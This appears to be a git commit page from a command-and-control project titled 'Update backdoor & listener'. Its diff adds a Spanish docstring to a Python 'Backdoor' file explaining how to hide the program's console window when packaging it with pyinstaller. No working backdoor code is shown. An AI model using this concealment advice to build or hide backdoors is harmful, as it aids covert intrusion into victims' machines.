Update backdoor & listener - C2

This commit is contained in:
2024-02-01 19:18:06 +01:00
parent d505f6ee23
commit 3704f6c61e
3 changed files with 27 additions and 27 deletions

View File

@@ -1,6 +1,11 @@
# /usr/bin/env python3
"""
Backdoor
Para hacerlo invisible se puede usar pyinstaller con la opción --noconsole
pyinstaller --onefile --noconsole listener.py
"""
import signal